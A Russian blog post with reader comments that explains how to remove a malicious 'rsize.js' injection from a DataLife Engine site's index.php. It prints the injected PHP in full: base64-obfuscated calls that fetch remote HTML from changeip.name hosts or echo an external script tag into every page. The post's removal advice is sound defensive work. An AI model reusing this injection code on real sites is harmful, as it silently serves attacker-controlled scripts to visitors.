Ну, вот, очередная зараза, но на этот раз она постигла "КотинДом", под названием rsize.js. Она обнаружилась совершенно случайно, и это очень хорошо, что я её выловила!! Попыталась найти лечение через поисковики, но как-то безуспешно, но через Яндекс всё-таки удалось найти решение.  Эту гадость можно увидеть также просмотрев код страницы, например, через браузер Хром. Она будет прятаться в конце и выглядеть примерно таким образом: 

<script src="http://kinoshkaxa. changeip.name/rsize.js"></script> 

У кого возникла такая же проблема, делаем следующее:

1. Заходим в корневую директорию сайта и находим там файл: index.php. Именно в этом файле и прячется вредоносный код 

2. Открываем наш файл и в конце находит этот скрипт, он выглядел у меня вот так:  

echo "\n<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->\r\n";GzipOut();
function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {
        $get = sql2_safe("aHR0cDovL2N0cmxzaS5jaGFuZ2VpcC5uYW1lOjg4OC9zY3JpcHQuaHRtbA==");$content = @file_get_contents($get);if (!$content)echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly90b3VjaG1lLmNoYW5nZWlwLm5hbWUvcnNpemUuanMiPjwvc2NyaXB0Pg==");else echo $content;}
collectnewss ();
 

3. Находим его и всё это удаляем, там в конце будет такая штуковинка и её нужно оставить: ?>, а этот вредоносный код сверху 

4. После удаления выставляем права доступа на index.php: 444 

5. И на всякий случай берем на заметку этот сайт, он проверяет сайты на вирусы: 

АнтивирусАларм

Безопасность веб-сайтов



Понравилась новость

Очередная зараза: файл-скрипт на сайте - rsize.js

Напишите пожалуйста своё мнение, Коте будет очень приятно :)




Комментарии к публикации Очередная зараза: файл-скрипт на сайте - rsize.js:



Ответить
24 января 2013 18:18
Опять Котька какую-то заразу подхватила, что ж тебе так не везет???  
Ответить
8 февраля 2013 12:52
Спасибо!!!!!=)))) Очень выручили и помогли!! Спасибо вам огромное!!!
Ответить
8 февраля 2013 12:54
Усталый человек, не за что :) Надо объединять усилия по борьбе с засранцами!  21
Ответить
8 февраля 2013 12:55
 Согласен!=)))
Ответить
8 февраля 2013 12:56
Усталый человек, +++! 
Римма
Ответить
30 марта 2013 10:39

Ой спасибо! Только благодаря вам получилось избавиться от такой же ошибки. Больше никакие сайты не давали такой подробной информации.

Теперь мой сайт rimma-style.ru снова работает безопасно.

Скажите, если я так же поставлю права доступа 444. сайт будет по прежнему открываться или что то нарушится? 

 

Ответить
30 марта 2013 19:39
Римма, очень приятно, что статья вам пригодилась! Нет, ничего не нарушится, ваш сайт хорошо открывается :)
Ответить
3 апреля 2013 11:23
Спасибо, помогло.
Ответить
4 апреля 2013 01:51
freekir, очень рада, что статья вам помогла!
denzl
Ответить
7 апреля 2013 10:27
СПАСИБО!!!
Ответить
7 апреля 2013 21:31
denzl, всегда пожалуйста! :) 
gost
Ответить
8 апреля 2013 09:17
Спасибо огромное помогло в jommla так же удаляется, но надо еще сам скрипт удалить он на сайте лежит.
Ответить
8 апреля 2013 12:26
gost, очень хорошо, что вам помогло! :) А где у вас лежит этот скрипт, если не секрет? В корневой папке?

Имя:*
E-Mail:
Комментарий: